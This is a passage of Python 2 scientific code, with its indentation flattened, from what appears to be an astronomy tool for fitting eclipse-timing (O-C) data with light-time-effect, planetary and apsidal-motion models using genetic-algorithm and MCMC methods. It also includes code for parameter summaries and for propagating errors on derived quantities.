#add fixed parameters
if not x in param: param[x]=self.params[x]
model=self.Model(param=param) #calculate model
return sum(((model-self.oc)/self.err)**2)
def FitGA(self,generation,size,mut=0.5,SP=2,plot_graph=False,visible=True,
n_thread=1,db=None):
'''fitting with Genetic Algorithms
generation - number of generations - should be approx. 100-200 x number of free parameters
size - number of individuals in one generation (size of population) - should be approx. 100-200 x number of free parameters
mut - proportion of mutations
SP - selection pressure (see Razali&Geraghty (2011) for details)
plot_graph - plot figure of best and mean solution found in each generation
visible - display status of fitting
n_thread - number of threads for multithreading
db - name of database to save GA fitting details (could be analysed later using InfoGA function)
'''
def Thread(subpopul):
#thread's function for multithreading
for i in subpopul: objfun[i]=self.Chi2(popul.p[i])
limits=self.limits
steps=self.steps
popul=TPopul(size,self.fit_params,mut,steps,limits,SP) #init GA Class
min0=1e15 #large number for comparing -> for finding min. value
p={} #best set of parameters
if plot_graph:
graph=[]
graph_mean=[]
objfun=[] #values of Objective Function
for i in range(size): objfun.append(0)
if db is not None:
#saving GA fitting details
save_dat={}
save_dat['chi2']=[]
for par in self.fit_params: save_dat[par]=[]
path=db.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('/')>0:
path=path[:path.rfind('/')+1] #find current dir of db file
if not os.path.isdir(path): os.mkdir(path) #create dir of db file, if not exist
if not visible:
#hidden output
f = open(os.devnull, 'w')
out=sys.stdout
sys.stdout=f
tic=time()
for gen in range(generation):
#main loop of GA
threads=[]
sys.stdout.write('gen: '+str(gen+1)+' / '+str(generation)+' in '+str(np.round(time()-tic,1))+' sec ')
sys.stdout.flush()
for t in range(n_thread):
#multithreading
threads.append(threading.Thread(target=Thread,args=[range(int(t*size/float(n_thread)),
int((t+1)*size/float(n_thread)))]))
#waiting for all threads and joining them
for t in threads: t.start()
for t in threads: t.join()
#finding best solution in population and compare with global best solution
i=np.argmin(objfun)
if objfun[i]<min0:
min0=objfun[i]
p=dict(popul.p[i])
if plot_graph:
graph.append(min0)
graph_mean.append(np.mean(np.array(objfun)))
if db is not None:
save_dat['chi2'].append(list(objfun))
for par in self.fit_params:
temp=[]
for x in popul.p: temp.append(x[par])
save_dat[par].append(temp)
popul.Next(objfun) #generate new generation
sys.stdout.write('\r')
sys.stdout.flush()
sys.stdout.write('\n')
if not visible:
#hidden output
sys.stdout=out
f.close()
if plot_graph:
mpl.figure()
mpl.plot(graph,'-')
mpl.xlabel('Number of generations')
mpl.ylabel(r'Minimal $\chi^2$')
mpl.plot(graph_mean,'--')
mpl.legend(['Best solution',r'Mean $\chi^2$ in generation'])
if db is not None:
#saving GA fitting details to file
for x in save_dat: save_dat[x]=np.array(save_dat[x])
f=open(db,'wb')
pickle.dump(save_dat,f,protocol=2)
f.close()
for param in p: self.params[param]=p[param] #save found parameters
self.params_err={} #remove errors of parameters
#remove some values calculated from old parameters
self.paramsMore={}
self.paramsMore_err={}
return self.params
def FitMCMC(self,n_iter,burn=0,binn=1,visible=True,db=None):
'''fitting with Markov chain Monte Carlo
n_iter - number of MC iteration - should be at least 1e5
burn - number of removed steps before equilibrium - should be approx. 0.1-1% of n_iter
binn - binning size - should be around 10
visible - display status of fitting
db - name of database to save MCMC fitting details (could be analysed later using InfoMCMC function)
'''
#setting pymc sampling for fitted parameters
pars={}
for p in self.fit_params:
pars[p]=pymc.Uniform(p,lower=self.limits[p][0],upper=self.limits[p][1],value=self.params[p])
def model_fun(**vals):
'''model function for pymc'''
param=dict(vals)
for x in self.params:
#add fixed parameters
if not x in param: param[x]=self.params[x]
return self.Model(param=param)
#definition of pymc model
model=pymc.Deterministic(
eval=model_fun,
doc='model',
name='Model',
parents=pars,
trace=True,
plot=False)
#final distribution
if self._set_err or self._calc_err:
#if known errors of data -> normal/Gaussian distribution
y=pymc.Normal('y',mu=model,tau=1./self.err**2,value=self.oc,observed=True)
else:
#if unknown errors of data -> Poisson distribution
#note: should cause wrong performance of fitting, rather use function CalcErr for obtained errors
y=pymc.Poisson('y',mu=model,value=self.oc,observed=True)
#adding final distribution and sampling of parameters to model
Model=[y]
for v in pars.itervalues():
Model.append(v)
#create pymc object
if db is None: R=pymc.MCMC(Model)
else:
#saving MCMC fitting details
path=db.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('/')>0:
path=path[:path.rfind('/')+1] #find current dir of db file
if not os.path.isdir(path): os.mkdir(path) #create dir of db file, if not exist
R=pymc.MCMC(Model,db='pickle',dbname=db)
#setting pymc method - distribution and steps
for p in pars:
R.use_step_method(pymc.Metropolis,pars[p],proposal_sd=self.steps[p],
proposal_distribution='Normal')
if not visible:
#hidden output
f = open(os.devnull, 'w')
out=sys.stdout
sys.stdout=f
R.sample(iter=n_iter,burn=burn,thin=binn) #MCMC fitting/simulation
self.params_err={} #remove errors of parameters
#remove some values calculated from old parameters
self.paramsMore={}
self.paramsMore_err={}
for p in pars:
#calculate values and errors of parameters and save them
self.params[p]=R.stats()[p]['mean']
self.params_err[p]=R.stats()[p]['standard deviation']
print ''
R.summary() #summary of MCMC fitting
if not visible:
#hidden output
sys.stdout=out
f.close()
return self.params,self.params_err
def Summary(self,name=None):
'''summary of parameters, output to file "name"'''
params=[]
unit=[]
vals=[]
err=[]
for x in sorted(self.params.keys()):
#names, units, values and errors of model params
params.append(x)
vals.append(str(self.params[x]))
if not len(self.params_err)==0:
#errors calculated
if x in self.params_err: err.append(str(self.params_err[x]))
elif x in self.fit_params: err.append('---') #errors not calculated
else: err.append('fixed') #fixed params
elif x in self.fit_params: err.append('---') #errors not calculated
else: err.append('fixed') #fixed params
#add units
if x[0]=='a' or x[0]=='r': unit.append('AU')
elif x[0]=='P':
unit.append('d')
#also in years
params.append(x)
vals.append(str(self.params[x]/365.2425))
try: err.append(str(float(err[-1])/365.2425)) #error calculated
except: err.append(err[-1]) #error not calculated
unit.append('y')
elif x[0]=='Q': unit.append('d')
elif x[0]=='t': unit.append('JD')
elif x[0]=='e' or x[0]=='m': unit.append('')
elif x[0]=='w' or x[1]=='w':
#transform to deg
vals[-1]=str(np.rad2deg(float(vals[-1])))
try: err[-1]=str(np.rad2deg(float(err[-1]))) #error calculated
except: pass #error not calculated
unit.append('deg')
#calculate some more parameters, if not calculated
self.MassFun()
self.Amplitude()
self.ParamsApsidal()
#make blank line
params.append('')
vals.append('')
err.append('')
unit.append('')
for x in sorted(self.paramsMore.keys()):
#names, units, values and errors of more params
params.append(x)
vals.append(str(self.paramsMore[x]))
if not len(self.paramsMore_err)==0:
#errors calculated
if x in self.paramsMore_err:
err.append(str(self.paramsMore_err[x]))
else: err.append('---') #errors not calculated
else: err.append('---') #errors not calculated
#add units
if x[0]=='f' or x[0]=='M': unit.append('M_sun')
elif x[0]=='a': unit.append('AU')
elif x[0]=='P' or x[0]=='U':
unit.append('d')
#also in years
params.append(x)
vals.append(str(self.paramsMore[x]/365.2425))
try: err.append(str(float(err[-1])/365.2425)) #error calculated
except: err.append(err[-1]) #error not calculated
unit.append('y')
elif x[0]=='K':
unit.append('s')
#also in minutes
params.append(x)
vals.append(str(self.paramsMore[x]/60.))
try: err.append(str(float(err[-1])/60.)) #error calculated
except: err.append(err[-1]) #error not calculated
unit.append('m')
#generate text output
text=['parameter'.ljust(15,' ')+'unit'.ljust(10,' ')+'value'.ljust(30,' ')+'error']
for i in range(len(params)):
text.append(params[i].ljust(15,' ')+unit[i].ljust(10,' ')+vals[i].ljust(30,' ')+err[i].ljust(20,' '))
text.append('')
text.append('Model: '+self.model)
if len(self.params_err)==0: text.append('Fitting method: GA')
else: text.append('Fitting method: MCMC')
chi=self.Chi2(self.params)
n=len(self.t)
g=len(self.fit_params)
#calculate some stats
text.append('chi2 = '+str(chi))
if n-g>0: text.append('chi2_r = '+str(chi/(n-g)))
else: text.append('chi2_r = NA')
text.append('AIC = '+str(chi+2*g))
if n-g-1>0: text.append('AICc = '+str(chi+2*g*n/(n-g-1)))
else: text.append('AICc = NA')
text.append('BIC = '+str(chi+g*np.log(n)))
if name is None:
#output to screen
print '------------------------------------'
for t in text: print t
print '------------------------------------'
else:
#output to file
f=open(name,'w')
for t in text: f.write(t+'\n')
f.close()
def Amplitude(self):
'''calculate amplitude of O-C in seconds'''
output={}
if 'LiTE3' in self.model:
#LiTE3 and LiTE3Quad models
if 'K4' in self.paramsMore:
#remove values calculated before
del self.paramsMore['K4']
if 'K4' in self.paramsMore_err: del self.paramsMore_err['K4']
self.paramsMore['K3']=self.params['a_sin_i3']*AU/c*np.sqrt(1-self.params['e3']**2*np.cos(self.params['w3'])**2)
output['K3']=self.paramsMore['K3']
if len(self.params_err)>0:
#calculate error of Amplitude
#get errors of params of 3rd body
if 'e3' in self.params_err: e_err=self.params_err['e3']
else: e_err=0
if 'a_sin_i3' in self.params_err: a_err=self.params_err['a_sin_i3']*AU
else: a_err=0
if 'w3' in self.params_err: w_err=self.params_err['w3']
else: w_err=0
#partial derivations
sqrt=np.sqrt(1-self.params['e3']*np.cos(self.params['w3']))
da=sqrt/c #dK3/d(a_sin_i3)
de=-self.params['a_sin_i3']*AU*self.params['e3']*np.cos(self.params['w3'])/(c*sqrt) #dK3/de3
dw=self.params['a_sin_i3']*AU*self.params['e3']**2*np.sin(self.params['w3'])*np.cos(self.params['w3'])/(c*sqrt) #dK3/dw3
self.paramsMore_err['K3']=np.sqrt((da*a_err)**2+(de*e_err)**2+(dw*w_err)**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['K3']==0: del self.paramsMore_err['K3']
else: output['K3_err']=self.paramsMore_err['K3']
if 'LiTE34' in self.model:
#LiTE34 and LiTE34Quad models
self.paramsMore['K4']=self.params['a_sin_i4']*AU/c*np.sqrt(1-self.params['e4']**2*np.cos(self.params['w4'])**2)
output['K4']=self.paramsMore['K4']
if len(self.params_err)>0:
#calculate error of Amplitude
#get errors of params of 4th body
if 'e4' in self.params_err: e_err=self.params_err['e4']
else: e_err=0
if 'a_sin_i4' in self.params_err: a_err=self.params_err['a_sin_i4']*AU
else: a_err=0
if 'w4' in self.params_err: w_err=self.params_err['w4']
else: w_err=0
#partial derivations
sqrt=np.sqrt(1-self.params['e4']*np.cos(self.params['w4']))
da=sqrt/c #dK4/d(a_sin_i4)
de=-self.params['a_sin_i4']*AU*self.params['e4']*np.cos(self.params['w4'])/(c*sqrt) #dK4/de4
dw=self.params['a_sin_i4']*AU*self.params['e4']**2*np.sin(self.params['w4'])*np.cos(self.params['w4'])/(c*sqrt) #dK4/dw4
self.paramsMore_err['K4']=np.sqrt((da*a_err)**2+(de*e_err)**2+(dw*w_err)**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['K4']==0: del self.paramsMore_err['K4']
else: output['K4_err']=self.paramsMore_err['K4']
if 'ExPlanet' in self.model:
#AgolExPlanet and AgolExPlanetLin models
if 'K4' in self.paramsMore:
#remove values calculated before
del self.paramsMore['K4']
if 'K4' in self.paramsMore_err: del self.paramsMore_err['K4']
self.paramsMore['K3']=day*self.params['mu3']/(2*np.pi*(1-self.params['mu3']))*self.params['P']**2/self.params['P3']*\
(1-self.params['e3']**2)**(-3./2.)*2*(np.arctan(self.params['e3']/(1+np.sqrt(1-self.params['e3']**2)))+self.params['e3'])
output['K3']=self.paramsMore['K3']
if len(self.params_err)>0:
#calculate error of Amplitude
#get errors of params of 3rd body
if 'e3' in self.params_err: e_err=self.params_err['e3']
else: e_err=0
if 'P3' in self.params_err: P3_err=self.params_err['P3']*day
else: P3_err=0
if 'mu3' in self.params_err: mu_err=self.params_err['mu3']
else: mu_err=0
if 'P' in self.params_err: P_err=self.params_err['P']*day
else: P_err=0
#partial derivations
K=self.paramsMore['K3']
dmu=K/(1-self.params['mu3']) #dK3/dmu3
dP=2*K/self.params['P']/day #dK3/dP
dP3=-K/self.params['P3']/day #dK3/dP3
e=self.params['e3']
de=day*self.params['mu3']/(2*np.pi*(1-self.params['mu3']))*self.params['P']**2/self.params['P3']*\
((4*np.sqrt(1-e**2))*e**2+2*np.sqrt(1-e**2)+6*np.sqrt(1-e**2)*e*np.arctan(e/(np.sqrt(1-e**2)+1))+1)/(e**2-1)**3 #dK3/de3
self.paramsMore_err['K3']=np.sqrt((dmu*mu_err)**2+(dP*P_err)**2+(dP3*P3_err)**2+(de*e_err)**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['K3']==0: del self.paramsMore_err['K3']
else: output['K3_err']=self.paramsMore_err['K3']
if 'InPlanet' in self.model:
#AgolInPlanet and AgolInPlanetLin models
if 'K4' in self.paramsMore:
#remove values calculated before
del self.paramsMore['K4']
if 'K4' in self.paramsMore_err: del self.paramsMore_err['K4']
self.paramsMore['K3']=day*self.params['P']*self.params['mu3']*self.params['r3']*np.sqrt(1-self.params['e']**2)/\
(2*np.pi*self.params['a']*(1-self.params['e']*np.sin(self.params['w'])))
output['K3']=self.paramsMore['K3']
if len(self.params_err)>0:
#calculate error of Amplitude
#get errors of params of 3rd body
if 'e' in self.params_err: e_err=self.params_err['e']
else: e_err=0
if 'mu3' in self.params_err: mu_err=self.params_err['mu3']
else: mu_err=0
if 'P' in self.params_err: P_err=self.params_err['P']*day
else: P_err=0
if 'r3' in self.params_err: r_err=self.params_err['r3']*AU
else: r_err=0
if 'a' in self.params_err: a_err=self.params_err['a']*AU
else: a_err=0
if 'w' in self.params_err: w_err=self.params_err['w']
else: w_err=0
#partial derivations
K=self.paramsMore['K3']
dmu=K/self.params['mu3'] #dK3/dmu3
dP=K/self.params['P']/day #dK3/dP
dr=K/self.params['r3']/AU #dK3/dr3
da=K/self.params['a']/AU #dK3/da
e=self.params['e']
w=self.params['w']
de=-K*np.sqrt(1+e)*(e-np.sin(w))/(1-e*np.sin(w)) #dK3/de
dw=K*e*np.cos(w)/(1-e*np.sin(w)) #dK3/dw
self.paramsMore_err['K3']=np.sqrt((dmu*mu_err)**2+(dP*P_err)**2+(dr*r_err)**2
+(de*e_err)**2+(da*a_err)**2+(dw*w_err)**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['K3']==0: del self.paramsMore_err['K3']
else: output['K3_err']=self.paramsMore_err['K3']
if 'Apsid' in self.model:
#Apsidal motion
if 'K4' in self.paramsMore:
#remove values calculated before
del self.paramsMore['K4']
if 'K4' in self.paramsMore_err: del self.paramsMore_err['K4']
self.paramsMore['K3']=day*self.params['P']*self.params['e']/np.pi
output['K3']=self.paramsMore['K3']
if len(self.params_err)>0:
#calculate error of Amplitude
#get errors of params of 3rd body
if 'e' in self.params_err: e_err=self.params_err['e']
else: e_err=0
if 'P' in self.params_err: P_err=self.params_err['P']
else: P_err=0
self.paramsMore_err['K3']=self.paramsMore['K3']*np.sqrt((P_err/self.params['P'])**2+\
(e_err/self.params['e'])**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['K3']==0: del self.paramsMore_err['K3']
else: output['K3_err']=self.paramsMore_err['K3']
return output
def ParamsApsidal(self):
'''calculate some params for model of apsidal motion'''
output={}
if not 'Apsidal' in self.model: return output
self.paramsMore['Ps']=self.params['P']*(1-self.params['dw']/(2*np.pi))
self.paramsMore['U']=self.paramsMore['Ps']*2*np.pi/self.params['dw']
output['Ps']=self.paramsMore['Ps']
output['U']=self.paramsMore['U']
if len(self.params_err)>0:
#calculate error of params
#get errors of params of model
if 'P' in self.params_err: P_err=self.params_err['P']
else: P_err=0
if 'dw' in self.params_err: dw_err=self.params_err['dw']
else: dw_err=0
self.paramsMore_err['Ps']=np.sqrt((1-self.params['dw']/(2*np.pi))**2*P_err**2+\
(self.params['P']/(2*np.pi)*dw_err)**2)
self.paramsMore_err['U']=self.paramsMore['U']*np.sqrt((P_err/self.params['P'])**2+\
(dw_err/self.params['dw'])**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['Ps']==0: del self.paramsMore_err['Ps']
else: output['Ps_err']=self.paramsMore_err['Ps']
if self.paramsMore_err['U']==0: del self.paramsMore_err['U']
else: output['U_err']=self.paramsMore_err['U']
return output
def MassFun(self):
'''calculate Mass Function for LiTE models'''
output={}
if 'LiTE3' in self.model:
#LiTE3 and LiTE3Quad models
if 'f_m4' in self.paramsMore:
#remove values calculated before
del self.paramsMore['f_m4']
if 'f_m4' in self.paramsMore_err: del self.paramsMore_err['f_m4']
self.paramsMore['f_m3']=self.params['a_sin_i3']**3/(self.params['P3']/365.2425)**2
output['f_m3']=self.paramsMore['f_m3']
if len(self.params_err)>0:
#calculate error of Mass Function
#get errors of params of 3rd body
if 'P3' in self.params_err: P3_err=self.params_err['P3']
else: P3_err=0
if 'a_sin_i3' in self.params_err: a_err=self.params_err['a_sin_i3']
else: a_err=0
self.paramsMore_err['f_m3']=self.paramsMore['f_m3']*np.sqrt(9*(a_err/self.params['a_sin_i3'])**2+\
4*(P3_err/self.params['P3'])**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['f_m3']==0: del self.paramsMore_err['f_m3']
else: output['f_m3_err']=self.paramsMore_err['f_m3']
if 'LiTE34' in self.model:
#LiTE34 and LiTE34Quad models
self.paramsMore['f_m4']=self.params['a_sin_i4']**3/(self.params['P4']/365.2425)**2
output['f_m4']=self.paramsMore['f_m4']
if len(self.params_err)>0:
#calculate error of Mass Function
#get errors of params of 4th body
if 'P4' in self.params_err: P4_err=self.params_err['P4']
else: P4_err=0
if 'a_sin_i4' in self.params_err: a_err=self.params_err['a_sin_i4']
else: a_err=0
self.paramsMore_err['f_m4']=self.paramsMore['f_m4']*np.sqrt(9*(a_err/self.params['a_sin_i4'])**2+\
4*(P4_err/self.params['P4'])**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['f_m4']==0: del self.paramsMore_err['f_m4']
else: output['f_m4_err']=self.paramsMore_err['f_m4']
return output
def AbsoluteParam(self,M,i=90,M_err=0,i_err=0):
'''calculate mass and semi-mayor axis of 3rd body from mass of binary and inclination'''
self.MassFun()
output={}
if 'LiTE3' in self.model:
#LiTE3 and LiTE3Quad models
self.paramsMore['a12']=self.params['a_sin_i3']/np.sin(np.deg2rad(i))
f=self.paramsMore['f_m3']/np.sin(np.deg2rad(i))**3 #Mass function of 3rd body/sin(i)**3
root=(2*f**3+18*f**2*M+3*np.sqrt(3)*np.sqrt(4*f**3*M**3+27*f**2*M**4)+27*f*M**2)**(1./3.)
self.paramsMore['M3']=root/(3.*2.**(1./3.))-2.**(1./3.)*(-f**2-6.*f*M)/(3.*root)+f/3.
self.paramsMore['a3']=self.paramsMore['a12']*M/self.paramsMore['M3']
self.paramsMore['a']=self.paramsMore['a12']+self.paramsMore['a3']
output['M3']=self.paramsMore['M3']
output['a12']=self.paramsMore['a12']
output['a3']=self.paramsMore['a3']
output['a']=self.paramsMore['a']
if len(self.params_err)>0:
#calculate error of params
#get errors of params of 3rd body
if 'a_sin_i3' in self.params_err: a_err=self.params_err['a_sin_i3']
else: a_err=0
if 'f_m3' in self.paramsMore_err: f3_err=self.paramsMore_err['f_m3']
else: f3_err=0
f_err=f*np.sqrt((f3_err/self.paramsMore['f_m3'])**2+9*(np.deg2rad(i_err)/np.tan(np.deg2rad(i)))**2)
#some strange partial derivations... (calculated using Wolfram Mathematica)
#dM3/dM
dM=-((2**(1/3.)*(f**2+6*f*M)*(54*f*M+(3*np.sqrt(3)*(8*f**3*M+108*f**2*M**3))/(2*np.sqrt(4*f**3*M**2+27*f**2*M**4))))/(9*(18*f**2+2*f**3+27*f*M**2+3*np.sqrt(3)*np.sqrt(4*f**3*M**2+\
27*f**2*M**4))**(4/3.)))+(54*f*M+(3*np.sqrt(3)*(8*f**3*M+108*f**2*M**3))/(2*np.sqrt(4*f**3*M**2+27*f**2*M**4)))/(9*2**(1/3.)*(18*f**2+2*f**3+27*f*M**2+3*np.sqrt(3)*np.sqrt(4*f**3*\
M**2+27*f**2*M**4))**(2/3.))+(2*2**(1/3.)*f)/(18*f**2+2*f**3+27*f*M**2+3*np.sqrt(3)*np.sqrt(4*f**3*M**2+27*f**2*M**4))**(1/3.)
#dM3/df
df=1/3.-(2**(1/3.)*(f**2+6*f*M)*(36*f+6*f**2+27*M**2+(3*np.sqrt(3)*(12*f**2*M**2+54*f*M**4))/(2*np.sqrt(4*f**3*M**2+27*f**2*M**4))))/(9*(18*f**2+2*f**3+27*f*M**2+3*np.sqrt(3)*\
np.sqrt(4*f**3*M**2+27*f**2*M**4))**(4/3.))+(36*f+6*f**2+27*M**2+(3*np.sqrt(3)*(12*f**2*M**2+54*f*M**4))/(2*np.sqrt(4*f**3*M**2+27*f**2*M**4)))/(9*2**(1/3.)*(18*f**2+2*f**3+\
27*f*M**2+3*np.sqrt(3)*np.sqrt(4*f**3*M**2+27*f**2*M**4))**(2/3.))+(2**(1/3.)*(2*f+6*M))/(3*(18*f**2+2*f**3+27*f*M**2+3*np.sqrt(3)*np.sqrt(4*f**3*M**2+27*f**2*M**4))**(1/3.))
#calculate errors of params
self.paramsMore_err['a12']=self.paramsMore['a12']*np.sqrt((a_err/self.params['a_sin_i3'])**2+(np.deg2rad(i_err)/np.tan(np.deg2rad(i)))**2)
self.paramsMore_err['M3']=np.sqrt((dM*M_err)**2+(df*f_err)**2)
self.paramsMore_err['a3']=self.paramsMore['a3']*np.sqrt((self.paramsMore_err['a12']/self.paramsMore['a12'])**2+\
(M_err/M)**2+(self.paramsMore_err['M3']/self.paramsMore['M3'])**2)
self.paramsMore_err['a']=self.paramsMore_err['a12']+self.paramsMore_err['a3']
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['M3']==0: del self.paramsMore_err['M3']
else: output['M3_err']=self.paramsMore_err['M3']
if self.paramsMore_err['a12']==0: del self.paramsMore_err['a12']
else: output['a12_err']=self.paramsMore_err['a12']
if self.paramsMore_err['a3']==0: del self.paramsMore_err['a3']
else: output['a3_err']=self.paramsMore_err['a3']
if self.paramsMore_err['a']==0: del self.paramsMore_err['a']
else: output['a_err']=self.paramsMore_err['a']
if 'LiTE34' in self.model:
#Lite34 a Lite34Quad models
self.paramsMore['a12-3']=self.paramsMore['a']
output['a12-3']=self.paramsMore['a']
if 'a' in self.paramsMore_err:
self.paramsMore_err['a12-3']=self.paramsMore_err['a']
output['a_err']=self.paramsMore_err['a']
self.paramsMore['a123']=self.params['a_sin_i4']/np.sin(np.deg2rad(i))
f=self.paramsMore['f_m4']/np.sin(np.deg2rad(i))**3 #Mass function of 4th body/sin(i)**3
root=(2*f**3+18*f**2*M+3*np.sqrt(3)*np.sqrt(4*f**3*M**3+27*f**2*M**4)+27*f*M**2)**(1./3.)
self.paramsMore['M4']=root/(3*2**(1./3.))-2**(1./3.)*(-f**2-6*f*M)/(3*root)+f/3.
self.paramsMore['a4']=self.paramsMore['a12']*M/self.paramsMore['M4']
self.paramsMore['a']=self.paramsMore['a12']+self.paramsMore['a4']
output['M4']=self.paramsMore['M4']
output['a123']=self.paramsMore['a123']
output['a4']=self.paramsMore['a4']
output['a']=self.paramsMore['a']
if len(self.params_err)>0:
#calculate error of params
#get errors of params of 3rd body
if 'a_sin_i4' in self.params_err: a_err=self.params_err['a_sin_i4']
else: a_err=0
if 'f_m4' in self.paramsMore_err: f4_err=self.paramsMore_err['f_m4']
else: f4_err=0
f_err=f*np.sqrt((f4_err/self.paramsMore['f_m4'])**2+9*(np.deg2rad(i_err)/np.tan(np.deg2rad(i)))**2)
#some strange partial derivations... (calculated using Derive6)
#dM4/dM
#some strange partial derivations... (calculated using Wolfram Mathematica)
#dM3/dM
dM=-((2**(1/3.)*(f**2+6*f*M)*(54*f*M+(3*np.sqrt(3)*(8*f**3*M+108*f**2*M**3))/(2*np.sqrt(4*f**3*M**2+27*f**2*M**4))))/(9*(18*f**2+2*f**3+27*f*M**2+3*np.sqrt(3)*np.sqrt(4*f**3*M**2+\
27*f**2*M**4))**(4/3.)))+(54*f*M+(3*np.sqrt(3)*(8*f**3*M+108*f**2*M**3))/(2*np.sqrt(4*f**3*M**2+27*f**2*M**4)))/(9*2**(1/3.)*(18*f**2+2*f**3+27*f*M**2+3*np.sqrt(3)*np.sqrt(4*f**3*\
M**2+27*f**2*M**4))**(2/3.))+(2*2**(1/3.)*f)/(18*f**2+2*f**3+27*f*M**2+3*np.sqrt(3)*np.sqrt(4*f**3*M**2+27*f**2*M**4))**(1/3.)
#dM3/df
df=1/3.-(2**(1/3.)*(f**2+6*f*M)*(36*f+6*f**2+27*M**2+(3*np.sqrt(3)*(12*f**2*M**2+54*f*M**4))/(2*np.sqrt(4*f**3*M**2+27*f**2*M**4))))/(9*(18*f**2+2*f**3+27*f*M**2+3*np.sqrt(3)*\
np.sqrt(4*f**3*M**2+27*f**2*M**4))**(4/3.))+(36*f+6*f**2+27*M**2+(3*np.sqrt(3)*(12*f**2*M**2+54*f*M**4))/(2*np.sqrt(4*f**3*M**2+27*f**2*M**4)))/(9*2**(1/3.)*(18*f**2+2*f**3+\
27*f*M**2+3*np.sqrt(3)*np.sqrt(4*f**3*M**2+27*f**2*M**4))**(2/3.))+(2**(1/3.)*(2*f+6*M))/(3*(18*f**2+2*f**3+27*f*M**2+3*np.sqrt(3)*np.sqrt(4*f**3*M**2+27*f**2*M**4))**(1/3.))
#calculate errors of params
self.paramsMore_err['a123']=self.paramsMore['a123']*np.sqrt((a_err/self.params['a_sin_i4'])**2+(np.deg2rad(i_err)/np.tan(np.deg2rad(i)))**2)
self.paramsMore_err['M4']=np.sqrt((dM*M_err)**2+(df*f_err)**2)
self.paramsMore_err['a4']=self.paramsMore['a4']*np.sqrt((self.paramsMore_err['a123']/self.paramsMore['a123'])**2+\
(M_err/M)**2+(self.paramsMore_err['M4']/self.paramsMore['M4'])**2)
self.paramsMore_err['a']=self.paramsMore_err['a123']+self.paramsMore_err['a4']
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['M4']==0: del self.paramsMore_err['M4']
else: output['M4_err']=self.paramsMore_err['M4']
if self.paramsMore_err['a123']==0: del self.paramsMore_err['a123']
else: output['a123_err']=self.paramsMore_err['a123']
if self.paramsMore_err['a4']==0: del self.paramsMore_err['a4']
else: output['a4_err']=self.paramsMore_err['a4']
if self.paramsMore_err['a']==0: del self.paramsMore_err['a']
else: output['a_err']=self.paramsMore_err['a']
if 'Agol' in self.model:
#AgolInPlanet, AgolInPlanetLin, AgolExPlanet, AgolExPlanetLin
self.paramsMore['M3']=M*self.params['mu3']/(1-self.params['mu3'])
self.paramsMore['a']=((self.params['P3']/365.2425)**2*(M+self.paramsMore['M3']))**(1./3.)
output['M3']=self.paramsMore['M3']
output['a']=self.paramsMore['a']
if len(self.params_err)>0:
#calculate error of params
#get errors of params of 3rd body
if 'mu3' in self.params_err: mu3_err=self.params_err['mu3']
else: mu3_err=0
if 'P3' in self.params_err: P3_err=self.params_err['P3']
else: P3_err=0
#calculate error of params
self.paramsMore_err['M3']=self.paramsMore['M3']*np.sqrt((M_err/M)**2+\
(mu3_err/(self.params['mu3']*(1-self.params['mu3'])))**2)
self.paramsMore_err['a']=self.paramsMore['a']/3.*np.sqrt(((M_err+self.paramsMore_err['M3'])/\
(M+self.paramsMore['M3']))**2+(2*P3_err/self.params['P3'])**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['M3']==0: del self.paramsMore_err['M3']
else: output['M3_err']=self.paramsMore_err['M3']
if self.paramsMore_err['a']==0: del self.paramsMore_err['a']
else: output['a_err']=self.paramsMore_err['a']
return output
def Model(self,t=None,param=None,min_type=None):
''''calculate model curve of O-C in given times based on given set of parameters'''
if t is None: t=self.t
if param is None: param=self.params
if self.model=='LiTE3':
model=self.LiTE3(t,param['a_sin_i3'],param['e3'],param['w3'],param['t03'],param['P3'])
elif self.model=='LiTE34':
model=self.LiTE34(t,param['a_sin_i3'],param['e3'],param['w3'],param['t03'],param['P3'],
param['a_sin_i4'],param['e4'],param['w4'],param['t04'],param['P4'])
elif self.model=='LiTE3Quad':
model=self.LiTE3Quad(t,param['t0'],param['P'],param['Q'],param['a_sin_i3'],param['e3'],
param['w3'],param['t03'],param['P3'])
elif self.model=='LiTE34Quad':
model=self.LiTE34Quad(t,param['t0'],param['P'],param['Q'],
param['a_sin_i3'],param['e3'],param['w3'],param['t03'],param['P3'],
param['a_sin_i4'],param['e4'],param['w4'],param['t04'],param['P4'])
elif self.model=='AgolInPlanet':
model=self.AgolInPlanet(t,param['P'],param['a'],param['w'],param['e'],
param['mu3'],param['r3'],param['w3'],param['t03'],param['P3'])
elif self.model=='AgolInPlanetLin':
model=self.AgolInPlanetLin(t,param['t0'],param['P'],param['a'],param['w'],param['e'],
param['mu3'],param['r3'],param['w3'],param['t03'],param['P3'])
elif self.model=='AgolExPlanet':
model=self.AgolExPlanet(t,param['P'],param['mu3'],param['e3'],param['t03'],param['P3'])
elif self.model=='AgolExPlanetLin':
model=self.AgolExPlanetLin(t,param['t0'],param['P'],param['mu3'],param['e3'],param['t03'],param['P3'])
elif self.model=='Apsidal':
if min_type is None: min_type=self._min_type
model=self.Apsidal(t,param['t0'],param['P'],param['w0'],param['dw'],param['e'],min_type)
else:
raise ValueError('The model "'+self.model+'" does not exist!')
return model
def CalcErr(self):
'''estimate errors of input data based on current model (useful before using FitMCMC)'''
model=self.Model(self.t,self.params) #calculate model values
n=len(model) #number of data points
err=np.sqrt(sum((self.oc-model)**2)/(n-1)) #calculate corrected sample standard deviation
err*=np.ones(model.shape) #generate array of errors
chi=sum(((self.oc-model)/err)**2) #calculate new chi2 error -> chi2_r = 1
print 'New chi2:',chi,chi/(n-len(self.fit_params))
self._calc_err=True
self._set_err=False
self.err=err
return err
def CorrectErr(self):
'''correct scale of given errors of input data based on current model
(useful if FitMCMC gives worse results like FitGA and chi2_r is not approx. 1)'''
model=self.Model(self.t,self.params) #calculate model values
n=len(model) #number of data points
